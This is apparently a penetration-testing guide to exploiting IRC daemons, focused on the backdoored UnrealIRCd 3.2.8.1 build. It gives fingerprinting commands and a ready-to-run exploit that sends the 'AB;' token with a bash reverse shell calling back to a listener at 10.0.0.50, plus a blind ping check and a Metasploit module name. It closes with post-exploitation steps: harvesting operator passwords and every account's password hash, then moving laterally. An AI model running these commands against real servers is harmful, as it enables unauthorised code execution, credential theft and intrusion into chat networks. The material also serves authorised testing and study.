Once enumeration has pinned the ircd build, the daemon itself becomes the target, and the single most reliable case is the backdoored UnrealIRCd 3.2.8.1 distribution. For a period the official download archive of UnrealIRCd 3.2.8.1 was modified to include a backdoor: the server reads lines in the pre-authentication phase, and any line beginning with the token AB; has the remainder passed to system() and executed on the host. No NICK, no USER, no credentials: a raw socket and one line gives command execution as the user running the ircd. Other ircds add module-loading and TLS-parsing bugs, and the DCC subprotocol can be abused to push files to users.
Fingerprint first#
nmap -p6667 --script irc-unrealircd-backdoor <target>
# "Looks like trojaned version of unrealircd" confirms the backdoored build.
# otherwise read numeric 004/351 from a handshake: "Unreal3.2.8.1" is the vulnerable string
Confirm the exact build from the VERSION reply before firing anything; the backdoor is specific to the trojaned 3.2.8.1 tarball, and a clean 3.2.8.1 or any later 4.x/6.x build will not respond to the token.
Worked exploitation of the backdoored distribution#
The token is sent before authentication. A classic approach triggers a reverse shell by having the command call back to a listener:
# listener
nc -lvnp 4444 &
# send the backdoor token on a raw connection (no NICK/USER needed)
printf 'AB; /bin/bash -c "bash -i >& /dev/tcp/10.0.0.50/4444 0>&1"\r\n' | nc <target> 6667
The connection on the listener, returning a shell prompt, is the daemon executing everything after AB;. If outbound is filtered, use the same token for a blind check first:
printf 'AB; ping -c1 10.0.0.50\r\n' | nc <target> 6667
# watch for the ICMP echo on the listener side (tcpdump -i eth0 icmp) to confirm execution
The Metasploit module exploit/unix/irc/unreal_ircd_3281_backdoor automates the same token and handles the reverse or bind payload; interpret a returned session as code execution as the ircd user.
Variants and other ircds#
- InspIRCd and Charybdis modules: operator-loadable modules and some SSL/TLS gateway modules have had memory-corruption and parsing flaws; an operator reached through services and operator abuse who can
loadmodulecan also load an attacker-staged module for execution. - TLS-parsing bugs: ircds that link a vulnerable TLS library on 6697 inherit its handshake-parsing flaws, reachable pre-auth on the encrypted port.
- DCC abuse: the client-to-client DCC SEND/CHAT subprotocol runs over a direct TCP connection negotiated through the server; a positioned or operator attacker can offer a malicious file to a target user or abuse a bot that auto-accepts DCC transfers.
Follow-on#
- The backdoor and module paths both yield execution as the ircd service account; from there, read the ircd config for O:line and services passwords, and the services database for every registered account's password hash.
- A shell on the ircd host often sits inside the chat network's trust boundary, so linked servers and bots become reachable for lateral movement.